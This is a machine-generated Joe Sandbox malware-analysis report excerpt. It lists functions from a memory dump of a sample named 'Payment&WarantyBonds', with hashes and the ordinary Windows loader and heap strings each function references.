                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                                                                • Opcode ID: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                                                                                • Instruction ID: 6f08f812173736be08281aac73a842b9df27c7b1c598a6683b3d6d8dc036d6b7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                                                                                • Instruction Fuzzy Hash: E9F19B71A0060ADFEB25CF68C894B6AB7FAFF44304F148169E516DB385D734EA81CB91
                                                                                                                                                                                Function 01826962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                                                                • Opcode ID: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                                                                                • Instruction ID: 121959c4d56d6271fe043719fe9020a5dbb26d9bfeb18ea54b175bb95b893214
                                                                                                                                                                                • Opcode Fuzzy Hash: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                                                                                • Instruction Fuzzy Hash: DCC29F716083559FDB26CF29C880BABBBE5AF98714F04892DF9C9C7241E734DA44CB52
                                                                                                                                                                                Function 017FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                                                                • Opcode ID: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                                                                                • Instruction ID: ab8a491542b8b137baf9bcb716cc47f1e111848a9d63bcb67536220637d09bcd
                                                                                                                                                                                • Opcode Fuzzy Hash: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                                                                                • Instruction Fuzzy Hash: 67A16A759016299BDB719F68CC88BEABBB8EF44700F1001EAEA08E7251D7359F84CF51
                                                                                                                                                                                Function 01820BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpCheckModule, xrefs: 0186A117
                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-161242083
                                                                                                                                                                                • Opcode ID: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                                                                                • Instruction ID: 793f3410c555fe526a728b93bec754035b785b8f06b0cdd06526d00c2e703b19
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                                                                                • Instruction Fuzzy Hash: 747190B5A00609DBDB2ADF6CC985ABEB7F8FB44704F14402DE902E7255E734AB81CB51
                                                                                                                                                                                Function 0183C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-1783798831
                                                                                                                                                                                • Opcode ID: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                                                                                • Instruction ID: 8455e521a7b43ea92bdb2d4f7ac68ca48246f16f84c432ca28eb912573770eef
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                                                                                • Instruction Fuzzy Hash: B341F0B2540305ABD722EB6CD848F5B77E8AF84750F14492EFA54E3294EB74DA00CBD2
                                                                                                                                                                                Function 018BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • @, xrefs: 018BC1F1
                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                                                                                • PreferredUILanguages, xrefs: 018BC212
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                                                                • Opcode ID: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                                                                                • Instruction ID: 247a764581b4f9017ca81872359c8791832cebfb0b122956248ac8789976e7ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                                                                                • Instruction Fuzzy Hash: E7416272E0060EEBEB11DBD8C891FEEBBB8AB14704F14406AEA09F7350D7749B458B51
                                                                                                                                                                                Function 01894144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                                                                • Opcode ID: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                                                                                • Instruction ID: 54297f3dbf8eaf2993df8eecf6dc33401ae9411ea4e76da3954b5aca6538c510
                                                                                                                                                                                • Opcode Fuzzy Hash: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                                                                                • Instruction Fuzzy Hash: DA412672A046488BEF26DBD8CA44BADBBB9FF55344F180499D901EB791DB358B02CB11
                                                                                                                                                                                Function 01884755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                                                                                • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                                                                • Opcode ID: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                                                                                • Instruction ID: 1aabd870db46bf3f26d9ccaa59abf1040e73aee3c6cfa9781a670716ad550576
                                                                                                                                                                                • Opcode Fuzzy Hash: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A41D133A102568BCB21FE1CD940B26BBE4BF49B54F06026DED48E7312E730EA00CB91
                                                                                                                                                                                Function 01810BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                                                                • Opcode ID: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                                                                                • Instruction ID: 93e43523e2c189f6760efbd52cab3c0507f44658beef9c09ac5b916aee0910ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A11D2B2315106DFD719CA18C894F66F3A8EF40B59F18815DF406CB259DB34DA80C751
                                                                                                                                                                                Function 018820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                • API String ID: 0-2986994758
                                                                                                                                                                                • Opcode ID: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                                                                                • Instruction ID: dedf86292b0240d71f240dc1f9750d808a0036d2ec892b91cd5e207af72d98b8
                                                                                                                                                                                • Opcode Fuzzy Hash: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0C279680708ABE724E64CCC56F9977ADFB44B54F60006DFA00EB682D6B0BB40CA91
                                                                                                                                                                                Function 018103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                                                                • Opcode ID: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                                                                                • Instruction ID: 63f137d6876da51e3eeb74cf5c3ef1c1e7e39a9f44be5834b9a45bba5f701738
                                                                                                                                                                                • Opcode Fuzzy Hash: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                                                                                • Instruction Fuzzy Hash: D7713A72A0014A9FDB01DFA8C990BAEB7F8FF18704F144065E905EB255EA34EE41CBA1
                                                                                                                                                                                Function 0180A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                                                                • Opcode ID: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                                                                                • Instruction ID: 222be1ef098984274dd266c9d35e7f7b9aea9026275cd4b1c59f07dfa53f8659
                                                                                                                                                                                • Opcode Fuzzy Hash: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                                                                                • Instruction Fuzzy Hash: F4E17C71A0071DAFEF66CA9CCD90BAEBBBABF44314F14442AE901E7291D7349A41CB51
                                                                                                                                                                                Function 018CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                • Instruction ID: 018a78f0eff22b5f4842b94bed6e9f5932958b45289e75d576c61db92a2ebc1f
                                                                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                • Instruction Fuzzy Hash: A9C1D53120434A9BE729CF28C841B6BBBE5BFD4B18F144A2DF696C7290E775D605CB42
                                                                                                                                                                                Function 0187E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                • Opcode ID: 913d515436c9dc9c34f424f77e9e4c4e9b2c91f5275991b1f62681e3721a4929
                                                                                                                                                                                • Instruction ID: b00dd2c78e810bdd62b585d490f26c1e811f0e1b75670026d415b42ee46a09fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 913d515436c9dc9c34f424f77e9e4c4e9b2c91f5275991b1f62681e3721a4929
                                                                                                                                                                                • Instruction Fuzzy Hash: 33615D71E043199FDB15DFA8C840BAEBBB9FB48744F1440ADE649EB251DB31EA40CB50
                                                                                                                                                                                Function 018A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                • Opcode ID: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                                                                                • Instruction ID: 4d8c0838df7c4eb6e7a686406848c759e39313d918542ba783660d93dc01a369
                                                                                                                                                                                • Opcode Fuzzy Hash: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                                                                                • Instruction Fuzzy Hash: 4B513971D0161DAFEF11DFA9CC80AEEBBB9EB44754F54052AFA11F7280D6709A05CB60
                                                                                                                                                                                Function 018004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • kLsE, xrefs: 01800540
                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                • Opcode ID: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                                                                                • Instruction ID: 0b74e299e55be66835d088ad4763254e8702e10a7d5b6c135e859e49d400e9a0
                                                                                                                                                                                • Opcode Fuzzy Hash: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0851DE7150470A8FC766DF68C8407A3BBE5AF84340F10883EFAAAC7281E735D645CB92
                                                                                                                                                                                Function 0180A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                • Opcode ID: 55a8f8b4b9ac187d6bf8b951d7f71ecad906b5aca314522c6c6a75d3145b5cb8
                                                                                                                                                                                • Instruction ID: f0a69befccfb02fc33103bb96ce6c915691ef210ed025aaf160d45e46b471950
                                                                                                                                                                                • Opcode Fuzzy Hash: 55a8f8b4b9ac187d6bf8b951d7f71ecad906b5aca314522c6c6a75d3145b5cb8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D41BE31A04749CBEB2ACF5DC840B69BBB9FF94304F1540A5E904DB2A1E6B5DB00CB41
                                                                                                                                                                                Function 0183A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                • Opcode ID: b97fbcda27953e8e3a9ad40b0841319ce87778057205c7d575f073a978006289
                                                                                                                                                                                • Instruction ID: 0bb9a90092af779a432a2f5eda9ab899e45536ce486e49ebd92ba92d24a18d1e
                                                                                                                                                                                • Opcode Fuzzy Hash: b97fbcda27953e8e3a9ad40b0841319ce87778057205c7d575f073a978006289
                                                                                                                                                                                • Instruction Fuzzy Hash: E101D1B2244708AFD311DF18CD45F1677F8EB84B15F058939A688C7190F738DA04DB86
                                                                                                                                                                                Function 0180C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                • Opcode ID: 87e114587c1d09d26ba3623b97ddf40cc913b0fe06b7a42b67d42d532c9480c8
                                                                                                                                                                                • Instruction ID: 8263deea1f293c5f4b0546929680b45c0aea733a5b11d96d065a0a7d6797bcb1
                                                                                                                                                                                • Opcode Fuzzy Hash: 87e114587c1d09d26ba3623b97ddf40cc913b0fe06b7a42b67d42d532c9480c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E824D75E0061D8FEBA6CFA9CC807EDBBB1BF44314F1482A9D959EB291D7309A41CB50
                                                                                                                                                                                Function 01886420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                • Opcode ID: 6fadf4e969d41f50fab03e731938158b0d29b72836cf37f37cc89a3c3b2b0a17
                                                                                                                                                                                • Instruction ID: 2a2ce680f2a736e766197fb8b5160ec6aae6718ecda04119d352ff26771019f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fadf4e969d41f50fab03e731938158b0d29b72836cf37f37cc89a3c3b2b0a17
                                                                                                                                                                                • Instruction Fuzzy Hash: D3917771940219AFDB21DF99CD45FAE7BB8EF19B50F200065F600EB191E774AE40CB61
                                                                                                                                                                                Function 018AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                • Opcode ID: 45ce43a1f4e0b479dbbfd69e13fd07d106bbfa1fd0e78430aa67316f9a3444a1
                                                                                                                                                                                • Instruction ID: 1597f7a9f9ea6ac8ed228c61a01b1ce632975baf093d5260b1c0be8ea4190f81
                                                                                                                                                                                • Opcode Fuzzy Hash: 45ce43a1f4e0b479dbbfd69e13fd07d106bbfa1fd0e78430aa67316f9a3444a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1391A032900609BFEB22AFA9DC44FAFBBB9EF85754F540419F501E7251EB349A01CB91
                                                                                                                                                                                Function 0183A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                • Opcode ID: ccbf498b42c8dd9f8d64d02c753e7e10ad121971b2370dd181a17a0576ba891d
                                                                                                                                                                                • Instruction ID: 901ef4b4d455147b451a15bf83a5afd47658c47971892063be97478087b21a87
                                                                                                                                                                                • Opcode Fuzzy Hash: ccbf498b42c8dd9f8d64d02c753e7e10ad121971b2370dd181a17a0576ba891d
                                                                                                                                                                                • Instruction Fuzzy Hash: AA716CB5E0060A8FEF29CF9CC4906ADBBB1BF58744F24812EE505E7241F7318A41CB50
                                                                                                                                                                                Function 018A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .mui
                                                                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                                                                • Opcode ID: 1867b2205b5a1aed49d4882bbbfc7c6067399a4a83d8c0655ec6833b5706c0d3
                                                                                                                                                                                • Instruction ID: 58cbc55642a4c4f023c4eeebeeb256ec8b1c57df391184e688f72e187876d7df
                                                                                                                                                                                • Opcode Fuzzy Hash: 1867b2205b5a1aed49d4882bbbfc7c6067399a4a83d8c0655ec6833b5706c0d3
